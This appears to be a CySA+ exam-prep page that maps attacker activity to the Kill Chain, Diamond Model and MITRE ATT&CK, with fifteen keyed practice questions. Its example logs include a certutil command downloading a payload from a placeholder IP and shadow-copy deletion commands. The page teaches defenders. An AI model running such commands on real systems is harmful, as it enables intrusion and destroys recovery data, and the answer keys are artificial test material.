Triage BoardGet the app

Domain 3 · Incident Response and Management

Attack methodology frameworks: Kill Chain, Diamond Model, MITRE ATT&CK

Attack frameworks give you three vocabularies for one piece of attacker activity: the Cyber Kill Chain says how far the intrusion had progressed, the Diamond Model says who acted, with what, through what and against whom, and MITRE ATT&CK names the exact behavior (objective 3.1 of CS0-004). A stem gives you a log line or a paragraph from a report; answer in the vocabulary of the framework it names.

  • Exam code CS0-004
  • Domain weight 24%
  • Tickets here 15

Run one intrusion through all three frameworks

  1. Place it on the Kill Chain

    Ask how far the attacker had got. An exploit request reaching a VPN appliance is Delivery; the appliance running the attacker's code is Exploitation; a new service set to start at boot is Installation. The seven phases are ordered, so the phase also tells you which steps the attacker still has ahead.

  2. Fill the four corners of the Diamond

    Write down the adversary, the capability (malware, exploit, stolen credential), the infrastructure (servers, domains, accounts it ran through) and the victim. A corner you cannot fill is a finding too: it is the next thing to research.

  3. Label the behavior in ATT&CK

    Pick the tactic first (the attacker's goal at that moment), then the technique or sub-technique (how they reached it). Map only what a log line supports; a technique ID with no evidence behind it does not belong in the report.

  4. Turn the labels into defense

    The Kill Chain phase shows where to break the chain, the Diamond shows what to pivot on to find related activity, and the ATT&CK technique shows which detection to write or tune.

The three frameworks side by side

What each framework is built to answer
PointCyber Kill ChainDiamond ModelMITRE ATT&CK
Comes fromLockheed Martin paperCaltagirone et al., 2013MITRE knowledge base
Shape7 ordered phases4 vertices of one eventMatrix: tactics, techniques, sub-techniques
Unit of analysisA whole intrusionA single eventA single behavior
Is order fixed?Yes, linearNo; events link into threadsNo; tactics are not steps
The question it answersHow far did they get?Who, with what, via what, against whom?Exactly what did they do?
Defender's useBreak the chain earlyPivot to related activityDetection coverage, heat maps

Tactic names follow ATT&CK v19 as published on attack.mitre.org (checked October 2026).

The Kill Chain in order

ReconreconnaissanceWeaponizationattacker sideDeliveryExploitationInstallationCommand andcontrolActions onobjectives
Lockheed Martin's seven phases. Breaking any link denies the attacker every phase after it.

Reading a host log in all three vocabularies

event logSysmon events (lines 1, 3, 4) and one System-log event (line 2, ID 7045) from fictional workstation WS-ENG-23, 2 October 2026 (UTC)
02:14:07 EID=1    certutil.exe -urlcache -f http://198.51.100.40/u.bin C:\ProgramData\u.bin02:14:41 EID=7045 service=UpdSvc path=C:\ProgramData\u.bin start=auto02:19:03 EID=10   source=u.bin target=lsass.exe access=0x101002:31:55 EID=3    image=u.bin dst=203.0.113.77:443

Fictional host; addresses from the RFC 5737 documentation ranges. ATT&CK: line 1 is T1105 Ingress Tool Transfer, line 2 is T1543.003 Windows Service (Persistence), line 3 is T1003.001 LSASS Memory (Credential Access). Kill Chain: lines 1–2 are Installation. Diamond: u.bin is the capability, both addresses are infrastructure, WS-ENG-23 is the victim, and the adversary corner stays empty. Line 4 alone is an outbound HTTPS session: record it as infrastructure and hold the technique label until you can see the protocol.

How each framework shows up on the exam

Cyber Kill Chain

The Kill Chain is the only one of the three with a fixed order: Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command and Control, Actions on Objectives. Items give you an attacker action and ask for the phase, or name a control and ask which phase it disrupts. Pin the phase by the verb: built is Weaponization, sent is Delivery, ran is Exploitation, stayed is Installation, called home is Command and Control, took or broke is Actions on Objectives.

The trap is Weaponization. It happens on the attacker's own systems, before anything touches yours, so an option claiming your sensors observed it is usually wrong. You learn about Weaponization afterwards, from the artifact that was delivered.

Diamond Model of Intrusion Analysis

The Diamond describes a single event through four vertices (adversary, capability, infrastructure, victim) plus meta-features such as timestamp, phase, result, direction and methodology. It is an analysis tool for one event, and the exam likes to offer it as a lifecycle; it is not one. Its strength is pivoting: start from the vertex you know and use it to find the others, for example from one victim to every capability seen on that victim's network.

Keep the two technical corners apart. A stolen code-signing certificate is capability; a compromised partner mailbox used to relay lures is infrastructure.

MITRE ATT&CK

ATT&CK is a knowledge base of observed behavior: tactics are goals (TA numbers), techniques are ways to reach them (T numbers) and sub-techniques add a decimal (T1003.001). Procedures are how a specific group or tool carries a technique out. Scenario items hand you telemetry and ask for the most precise technique, the tactic behind it, or the detection gap a heat map reveals; the threat intelligence and hunting objective uses the same matrix for coverage work.

Know the current names. As of ATT&CK v19 (checked October 2026) the Enterprise matrix has 15 tactics: TA0005 is now called Stealth (formerly Defense Evasion), and a new tactic, TA0112 Defense Impairment, sits beside it. Study books written for CS0-004 may still print 14 tactics with Defense Evasion, so recognize both names.

ATT&CK behaviors are TTPs (tactics, techniques and procedures), which is why they sit at the top of the Pyramid of Pain: an indicator at that level costs the attacker the most to change.

Answer in the vocabulary the stem usesTrap

  • Options often mix the three frameworks. Installation and Actions on Objectives are Kill Chain words; Persistence, Credential Access and Lateral Movement are ATT&CK tactics; capability and infrastructure belong to the Diamond. Reconnaissance and Command and Control appear in both the Kill Chain and ATT&CK, so when an option uses one of those two names, read the rest of it before you decide.
  • Decide which framework the stem names first, then discard every option written in another framework's terms.

Map these tickets

Find out which framework the stem is using and answer in its vocabulary; the same moment of an attack carries a different name in each one.

Ticket 1 / 15

0 right

INC-001

In which phase of an advanced persistent threat (APT) campaign does the attacker achieve their long-term goals?

Pick an option to open the notes on all of them.

Key and notes on every option

Key: B

  1. ACommand and Control is where the attacker sets up a channel to steer the compromised host; the goals are pursued in the next phase.
  2. BCorrect: Actions on Objectives is the final Cyber Kill Chain phase, where the attacker does what the campaign was for, such as stealing data or disrupting systems.
  3. CInstallation is where malware or a backdoor is put in place for persistence, a step toward the goal rather than the goal itself.
  4. DExploitation is where a vulnerability is triggered to run code, which only opens the door.

INC-002

Which cybersecurity framework provides a comprehensive library of post-compromise techniques observed from real threat incidents?

Pick an option to open the notes on all of them.

Key and notes on every option

Key: B

  1. ATAXII is a protocol for exchanging threat intelligence, usually STIX data, not a library of attack techniques.
  2. BCorrect: MITRE ATT&CK is a knowledge base of adversary tactics and techniques built from real-world observations; it began with post-compromise behavior and now also covers early tactics such as Reconnaissance.
  3. CThe Diamond Model analyzes an intrusion event through four points (adversary, capability, infrastructure, victim) and does not catalog techniques.
  4. DThe Cyber Kill Chain describes seven high-level stages of an attack and offers no detailed library of observed techniques.

INC-003

Which phase of a phishing attack involves an attacker sending out the crafted email to the potential victims, aiming to exploit their lack of awareness?

Pick an option to open the notes on all of them.

Key and notes on every option

Key: D

  1. AReconnaissance is gathering information about targets, such as email addresses, before anything is sent.
  2. BExploitation happens when the victim opens the attachment or link and the payload's code runs.
  3. CInstallation is when malware sets up persistence on the victim's system after exploitation.
  4. DCorrect: Sending the crafted email to the victims is the Delivery phase, where the weaponized payload reaches the target.

INC-004

In the context of the Cyber Kill Chain framework, which of the following is NOT one of the seven steps?

Pick an option to open the notes on all of them.

Key and notes on every option

Key: C

  1. ADelivery is a Kill Chain phase: sending the weapon to the target.
  2. BReconnaissance is the first Kill Chain phase.
  3. CCorrect: Authorization is an access-control concept and appears nowhere among the seven phases (Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command and Control, Actions on Objectives).
  4. DWeaponization is the second phase, where an exploit is paired with a payload.

INC-005

Review the SIEM alerts below. Which MITRE ATT&CK phase correlation best groups these disparate logs into a single attack chain?

Exhibit

TimestampSourceRule Name
08:0110.0.5.12Suspicious PowerShell Download
08:0310.0.5.12Scheduled Task Creation
08:0510.0.5.12Multiple Failed Logins

Pick an option to open the notes on all of them.

Key and notes on every option

Key: B

  1. ANothing in the alerts shows an exploit or privilege elevation, let alone a zero-day.
  2. BCorrect: A PowerShell download (Execution) followed by a scheduled task (Persistence) on the same host within minutes forms one chain; ATT&CK calls these tactics rather than phases, and the failed logins that follow hint at Credential Access.
  3. CReconnaissance and Initial Access come before code runs on the host, but these alerts show code already running and persistence being set up.
  4. DNo alert shows credential dumping or connections to other hosts, so lateral movement is not supported.

INC-006

Review the correlated log telemetry. Which MITRE ATT&CK tactic does this activity most likely represent, and what is the optimal containment strategy?

Exhibit

TimestampHostLog Event Snippet
10:01:22DB-01cmd.exe /c vssadmin.exe delete shadows /all /quiet
10:01:45DB-01wmic.exe shadowcopy delete

Pick an option to open the notes on all of them.

Key and notes on every option

Key: B

  1. ADeleting shadow copies destroys local recovery points and moves no data off the host, so it is not exfiltration.
  2. BCorrect: Deleting volume shadow copies is the technique Inhibit System Recovery under the ATT&CK Impact tactic, a typical step right before ransomware encrypts, so the processes doing it should be stopped at once.
  3. CInitial Access is how the attacker first gets in, but these commands run on a host that is already under their control.
  4. DLateral movement means moving between hosts, and both commands ran locally on DB-01.

INC-007

Mapped ATT&CK techniques show varying confidence. Which host should be quarantined immediately?

Pick an option to open the notes on all of them.

Key and notes on every option

Key: A

  1. ACorrect: High-confidence T1078 Valid Accounts on a finance server means an attacker may be using real credentials on a sensitive system, which warrants immediate quarantine.
  2. BLow-confidence T1059 (scripting) on a development workstation is common and needs validation before drastic action.
  3. CT1007 System Service Discovery is low-impact reconnaissance, and medium confidence on a print server calls for investigation before any quarantine.
  4. DT1082 System Information Discovery is routine discovery activity, and low confidence on a marketing laptop does not justify quarantining it first.

INC-008

PowerShell logs show execution matching a scheduled admin task. Should this be mapped to a malicious technique?

Pick an option to open the notes on all of them.

Key and notes on every option

Key: D

  1. AMapping known, authorized admin activity to T1059.001 inflates technique counts with false positives.
  2. BEscalating approved maintenance as persistence wastes Tier 2 time on benign activity.
  3. CBlocking the task everywhere breaks legitimate administration with no evidence of malice.
  4. DCorrect: Activity that matches a documented, authorized admin task shows no malicious indicators, so mapping it to an attack technique would be over-mapping.

INC-009

Process creation logs show encoded PowerShell launched from a scheduled task with periodic DNS queries to an uncommon domain. Which ATT&CK sub-technique is the most precise mapping?

Pick an option to open the notes on all of them.

Key and notes on every option

Key: A

  1. ACorrect: Encoded PowerShell maps to the sub-technique T1059.001 and periodic DNS queries to an uncommon domain map to T1071.004, so this pair covers both observed behaviors most precisely.
  2. BT1547.001 Registry Run Keys is a different persistence method, and the evidence shows a scheduled task with no Run key involved.
  3. CT1059.003 is the Windows Command Shell (cmd.exe); PowerShell is T1059.001.
  4. DT1053 is the parent technique for scheduled tasks, so it is less precise than a sub-technique and misses the PowerShell and DNS C2 behavior.

INC-010

Evidence maps to T1059.001 PowerShell execution and T1071.004 DNS C2. Which detection rule combines telemetry to reduce false positives while maintaining high fidelity?

Pick an option to open the notes on all of them.

Key and notes on every option

Key: A

  1. ACorrect: Requiring both encoded PowerShell from a scheduled task and periodic DNS to an uncommon domain ties the rule to the exact mapped behaviors, which keeps false positives low.
  2. BScheduled task creation without checking the command line fires on routine admin jobs and ignores what the task actually runs.
  3. CHash matches catch only known scripts and miss encoded or modified PowerShell.
  4. DAlerting on all outbound DNS from workstations would bury analysts in noise.

INC-011

A SOC analyst is creating SIEM alerts for behaviors mapped to ATT&CK techniques from noisy endpoint and network logs. To ensure the alert qualifies for escalation to Tier 2, which evidence items must the alert include?

Pick an option to open the notes on all of them.

Key and notes on every option

Key: B

  1. ATechnique IDs and confidence scores state the conclusion but not how it was reached, so Tier 2 cannot check the mapping.
  2. BCorrect: Recording the data sources and detection logic behind each mapping lets Tier 2 reproduce and validate the alert before acting on it.
  3. CRaw excerpts and timestamps show what happened but not why it maps to a technique.
  4. DNaming two log types limits context and still leaves out the reasoning behind the mapping.

INC-012

Map each observed behavior to the most likely ATT&CK technique.

Exhibit

TimestampSourceAction
14:05DNSBeaconing to dynamic domains
14:22EDRScheduled task creation
14:45NetflowLateral SMB connections

Pick an option to open the notes on all of them.

Key and notes on every option

Key: A

  1. ACorrect: DNS beaconing is T1071.004 (Application Layer Protocol: DNS), scheduled task creation is T1053.005 (Scheduled Task) and lateral SMB connections are T1021.002 (SMB/Windows Admin Shares).
  2. BT1001 is Data Obfuscation, T1037 is Boot or Logon Initialization Scripts and T1070 is Indicator Removal, none of which match the three behaviors.
  3. CT1566 is Phishing, T1055 is Process Injection and T1087 is Account Discovery, none of which were observed.
  4. DT1041 is Exfiltration Over C2 Channel, T1547 is Boot or Logon Autostart Execution and T1110 is Brute Force, which do not match beaconing, a scheduled task or SMB movement.

INC-013

An ATT&CK heatmap for the environment shows no visibility into T1059 Command and Scripting Interpreter or T1071 Application Layer Protocol. Which sensorization change provides the highest detection value for the lowest engineering effort?

Pick an option to open the notes on all of them.

Key and notes on every option

Key: D

  1. ATurning registry auditing up everywhere creates huge noise and does not cover scripting or application-layer C2.
  2. BAdding agents to endpoints that are already covered adds no new visibility.
  3. CForwarding unparsed proxy logs adds volume without usable fields and does nothing for scripting visibility.
  4. DCorrect: PowerShell script-block logging covers T1059 scripting and DNS query logging covers DNS-based T1071 traffic, both using built-in features with little engineering effort.

INC-014

A report says: a phishing kit (1) was hosted on a rented VPS at 203.0.113.50 (2), run by a group tracked internally as Cluster 7 (3), and aimed at a bank's payroll staff (4). Which Diamond Model mapping is correct?

Pick an option to open the notes on all of them.

Key and notes on every option

Key: D

  1. AThis swaps the first two: a phishing kit is a capability, while the server that hosts it is infrastructure.
  2. BThe VPS is infrastructure the adversary uses, and the named group is the adversary, not infrastructure.
  3. CThis reverses the people: the group runs the operation (adversary) and the payroll staff are its target (victim).
  4. DCorrect: the kit is the capability, the VPS is infrastructure, the group is the adversary and the payroll staff are the victim.

INC-015

Two intrusions six months apart used different malware families. Both called back to domains registered with the same registrant email and the same name servers. Using the Diamond Model, what should the analyst do?

Pick an option to open the notes on all of them.

Key and notes on every option

Key: A

  1. ACorrect: the Diamond Model lets the analyst move from one vertex to related events; shared registration data links infrastructure.
  2. BAdversaries change tools often; a different capability does not rule out a link that the infrastructure shows.
  3. CLabeling a phase does not use the shared registration data, which is the lead that connects the two intrusions.
  4. DThe stem gives no evidence that the victims match; the common element is the domain registration.

Shift tally

0 / 0

Before you close this tab

  • Kill Chain = how far, in order. Diamond = one event, four corners. ATT&CK = the exact behavior, in no fixed order.
  • Weaponization happens on the attacker's side; your logs show what it produced.
  • Map a technique only when a log line supports it, and prefer the sub-technique when the evidence is specific.
  • ATT&CK v19 renamed Defense Evasion to Stealth and added Defense Impairment (attack.mitre.org, checked October 2026).
  • The labels feed the analysis step of the incident response process and the playbooks in incident response techniques.

Keep the queue going on your phone

Our practice app carries CySA+ questions to your phone, on iPhone and Android.